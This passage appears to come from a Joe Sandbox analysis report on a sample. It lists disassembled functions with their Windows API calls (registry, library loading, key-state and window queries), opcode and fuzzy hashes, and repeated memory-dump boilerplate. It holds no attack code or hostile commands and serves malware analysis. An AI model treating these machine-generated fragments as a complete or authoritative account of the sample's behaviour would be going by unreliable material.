RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0101013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 01010183
RegCloseKey.ADVAPI32(?,?), ref: 010101AF
RegCloseKey.ADVAPI32(00000000), ref: 010101BC

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 678c911e91bd782a1cc9bfbc32e2280e117cf9403518af23e77ad31f0234c366
Instruction ID: 1ff9f3479479f57127de54f9fd2ee6d63d633945437acab46acb60701f9172b6
Opcode Fuzzy Hash: 678c911e91bd782a1cc9bfbc32e2280e117cf9403518af23e77ad31f0234c366
Instruction Fuzzy Hash: 10517731208305AFEB14EF68CC81E6AB7E8FF84314F00881DF58587295DB39E948CB52

Function 0100D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0100D927
GetProcAddress.KERNEL32(00000000,?), ref: 0100D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 0100D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 0100DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0100DA21

Part of subcall function 00F95A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FF7896,?,?,00000000), ref: 00F95A2C
Part of subcall function 00F95A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FF7896,?,?,00000000,?,?), ref: 00F95A50

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 974c0d7346d29ec3ba777eae65862e7594a5d0c86d942486fddaf8dc4fdf0c0f
Instruction ID: c8acdbe5b39d73c72cfc0b37ddc76cbd94936b9e3b2cf19ccc819f3b1a647846
Opcode Fuzzy Hash: 974c0d7346d29ec3ba777eae65862e7594a5d0c86d942486fddaf8dc4fdf0c0f
Instruction Fuzzy Hash: FF511735A04209DFEB01EFA8C8849ADB7F5EF09320F058099E895AB352D739EA45CF50

Function 00FFE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00FFE61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00FFE648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00FFE687

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00FFE6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00FFE6B4

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 403e6b03e685940166b18c7db314db6eb03950f97521b2102ae561dadc6e34d4
Instruction ID: 02de296d477331a4ee691235644e24e2d4a761ee1b64847ee3f2a86742ba13bd
Opcode Fuzzy Hash: 403e6b03e685940166b18c7db314db6eb03950f97521b2102ae561dadc6e34d4
Instruction Fuzzy Hash: 50511A35A00109DFDF01EF68C981AAEBBF5EF09314B1480A9E949AB361DB75ED11EF50

Function 0101A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8126a8ef6c524acc8c3b7741bd9213dcf156989540364d99f8d58251effd0200
Instruction ID: bd3edb7eea0179db5d3378a95da82349198f888c13287697ced140862cc5f13f
Opcode Fuzzy Hash: 8126a8ef6c524acc8c3b7741bd9213dcf156989540364d99f8d58251effd0200
Instruction Fuzzy Hash: 8E41D335A06284EFE761DE68CC48FA9BFE4EB09360F040195FA95A72D9C738A945CB50

Function 00F92344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00F92357
ScreenToClient.USER32(010557B0,?), ref: 00F92374
GetAsyncKeyState.USER32(00000001), ref: 00F92399
GetAsyncKeyState.USER32(00000002), ref: 00F923A7

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: d4be7eca68b66ea26a3cc49aeaafcc3ac8d144bae81993d39fd47a341c02b11a
Instruction ID: 0061ac51c61f6a971adda3ed23aef0c3152da61840d5a496bd37257519c1921f
Opcode Fuzzy Hash: d4be7eca68b66ea26a3cc49aeaafcc3ac8d144bae81993d39fd47a341c02b11a
Instruction Fuzzy Hash: EC418F35A04106FBDF299F68CC45FEDBB74FB05370F20431AE86892294CB799994EB90

Function 00FE63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FE63E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00FE6433
TranslateMessage.USER32(?), ref: 00FE645C
DispatchMessageW.USER32(?), ref: 00FE6466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FE6475

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 6524a060be0a89ec6ef22166f1df947716c6833b219cc3ef25370f1bb12129e3
Instruction ID: 6e7cfadbda22c3414b8a861d13ca6c53599967c05e7982826e826f49dace0e49
Opcode Fuzzy Hash: 6524a060be0a89ec6ef22166f1df947716c6833b219cc3ef25370f1bb12129e3
Instruction Fuzzy Hash: 9531C531D0038AAFDB34CEB1DC44BB77BACAB253A0F140165E465C31D5E73A9489EB61

Function 00FE8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00FE8A30
PostMessageW.USER32(?,00000201,00000001), ref: 00FE8ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00FE8AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00FE8AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00FE8AF8

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 068a0008970c0f692aa8f2bddd6fccbbdb219eb83b0e540964e4894d53d75fe6
Instruction ID: 0a665dfb0134b7464656b7273d76d420ab76fbf09ad2085469a291ea2dfad385
Opcode Fuzzy Hash: 068a0008970c0f692aa8f2bddd6fccbbdb219eb83b0e540964e4894d53d75fe6
Instruction Fuzzy Hash: 9F31FF71900259EFCB10DFA8D94CA9E3BB5FB04325F10822AF829E61C0C7B89915EB90

Function 00FEB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00FEB204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00FEB221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00FEB259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00FEB27F
_wcsstr.LIBCMT ref: 00FEB289

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: ffe1a5e661106e57cee7a402dfea769448b281f0557b168d842efd29b5c235eb
Instruction ID: e444d0f6316994438680ee7e1034805902375419712f8f92dba2eb3a6e392590
Opcode Fuzzy Hash: ffe1a5e661106e57cee7a402dfea769448b281f0557b168d842efd29b5c235eb
Instruction Fuzzy Hash: 6C2126326042417BEB269B7ADC49EBF7B9CDF49760F008129F904DA191EF69DC40B7A0

Function 0101B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00F92612: GetWindowLongW.USER32(?,000000EB), ref: 00F92623

GetWindowLongW.USER32(?,000000F0), ref: 0101B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0101B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0101B1CF
GetSystemMetrics.USER32(00000004), ref: 0101B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,01000E90,00000000), ref: 0101B216

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 1e0bfafeaaa6e7812d569dd9d40133434da38d42b3cd0c3cbe79212880faa0e4
Instruction ID: 639542aa5470894aad71f0726ad7a4bb8e54622e2ab0dfddc51ff82783f7917a
Opcode Fuzzy Hash: 1e0bfafeaaa6e7812d569dd9d40133434da38d42b3cd0c3cbe79212880faa0e4
Instruction Fuzzy Hash: 8321D631A10211AFDB609E7CDC04A6A3BB4FB05321F114764FEB2D31E4D7399414CB80

Function 00FE9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FE9320

Part of subcall function 00F97BCC: _memmove.LIBCMT ref: 00F97C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FE9352
__itow.LIBCMT ref: 00FE936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FE9392
__itow.LIBCMT ref: 00FE93A3

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: b9f2a7a35ce62cc722ba0aee8e5ce87f00057b992be25b117360b21ae10ff074
Instruction ID: db20dea7249a88b9e4ab54994750e71db2d3588c95f666346d6635ee5b5b6109
Opcode Fuzzy Hash: b9f2a7a35ce62cc722ba0aee8e5ce87f00057b992be25b117360b21ae10ff074
Instruction Fuzzy Hash: B221D731B04348AFDB20AEA69C85EEE7BADEB88720F044025FD45DB1C1D6F58D45A7A1

Function 01005A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 01005A6E
GetForegroundWindow.USER32 ref: 01005A85
GetDC.USER32(00000000), ref: 01005AC1
GetPixel.GDI32(00000000,?,00000003), ref: 01005ACD
ReleaseDC.USER32(00000000,00000003), ref: 01005B08

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 73173c0790d06152a61243ad3bc1fa7f31e66aa353a7cc6d0a9d5c92dadff707
Instruction ID: a3975fc1ff55fbe0a1220c9628805c798a7d52e3d97a2615dd0a0d43a92c321c
Opcode Fuzzy Hash: 73173c0790d06152a61243ad3bc1fa7f31e66aa353a7cc6d0a9d5c92dadff707
Instruction Fuzzy Hash: 9921A135A00204AFEB10EF68DC84AAABBE5EF49350F04846DF949D7351CE79AD45DB90

Function 00F912F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F9134D
SelectObject.GDI32(?,00000000), ref: 00F9135C
BeginPath.GDI32(?), ref: 00F91373
SelectObject.GDI32(?,00000000), ref: 00F9139C

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 068006e1d5c59880fa42ea8e74496f4634a2e8581f8db32adf253f193a437265
Instruction ID: 25456d98ecd9ac00caf2a13fe86a25e19ccce149c87f1dae243615860c530981
Opcode Fuzzy Hash: 068006e1d5c59880fa42ea8e74496f4634a2e8581f8db32adf253f193a437265
Instruction Fuzzy Hash: 2F216031C0030AEFEF218F25DD05B6A7BB8FB14321F244266F891A6194D77B9995EF90

Function 00FF4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00FF4ABA
__beginthreadex.LIBCMT ref: 00FF4AD8
MessageBoxW.USER32(?,?,?,?), ref: 00FF4AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00FF4B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00FF4B0A

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 64c3079b6c9531d923b0715d643f356e64b41d934c27ccbc99b805acf0ac0820
Instruction ID: accaa597ebecc1c93065f65c583e2f2c3499e6990ccde1a5dc0225bc42d05ba7
Opcode Fuzzy Hash: 64c3079b6c9531d923b0715d643f356e64b41d934c27ccbc99b805acf0ac0820
Instruction Fuzzy Hash: ED114876D04208BBC7208FA89C04AAB7FACEF86330F144255FA14D3251D67AD9048BA0

Function 00FE8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FE821E
GetLastError.KERNEL32(?,00FE7CE2,?,?,?), ref: 00FE8228
GetProcessHeap.KERNEL32(00000008,?,?,00FE7CE2,?,?,?), ref: 00FE8237
HeapAlloc.KERNEL32(00000000,?,00FE7CE2,?,?,?), ref: 00FE823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FE8255

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 18214e0340398564694bbd83c348ea8381144bdb92b27fe042df913adb8898d5
Instruction ID: f8b9856bcac197fee2a1eacd91245bcbfdc337dd4a2fd3131961e256f54a02f4
Opcode Fuzzy Hash: 18214e0340398564694bbd83c348ea8381144bdb92b27fe042df913adb8898d5
Instruction Fuzzy Hash: 6C018171600245BFDB205FA6DC48D6B7FACEF8A7A4B500569F94DC3210DB368C05EB60

Function 00FE710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7044,80070057,?,?,?,00FE7455), ref: 00FE7127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7044,80070057,?,?), ref: 00FE7142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7044,80070057,?,?), ref: 00FE7150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7044,80070057,?), ref: 00FE7160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FE7044,80070057,?,?), ref: 00FE716C

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: cb639f592b854cc28e9594f71bcd429c6ab603183ab55d9604f6cfa5d935c860
Instruction ID: 00099f38ba5cb48390dcd224d3eed6a0c4e4692c40700abf97c5863ed74a1802
Opcode Fuzzy Hash: cb639f592b854cc28e9594f71bcd429c6ab603183ab55d9604f6cfa5d935c860
Instruction Fuzzy Hash: 8201DF72A01315BBCB209F65DC44BAA7BACEF447A1F100064FD48D2214E73ADD01ABA0

Function 00FF5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FF5260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00FF526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FF5276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00FF5280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FF52BC

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 7547c1871f25f73d9927d5cd85ccf70efb0a1d9885a90987517f89e1f6bcc0bd
Instruction ID: 935d4a1e758ca641deadc36db49cf4832cbcb3bca0611056bdd9a5101b33ebb6
Opcode Fuzzy Hash: 7547c1871f25f73d9927d5cd85ccf70efb0a1d9885a90987517f89e1f6bcc0bd
Instruction Fuzzy Hash: 0F015731D01A1EEBCF10EFE4E849AEDBB78BF09B11F400246EA81B2254CB39555497A1

Function 00FE810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FE8121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FE812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8157

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

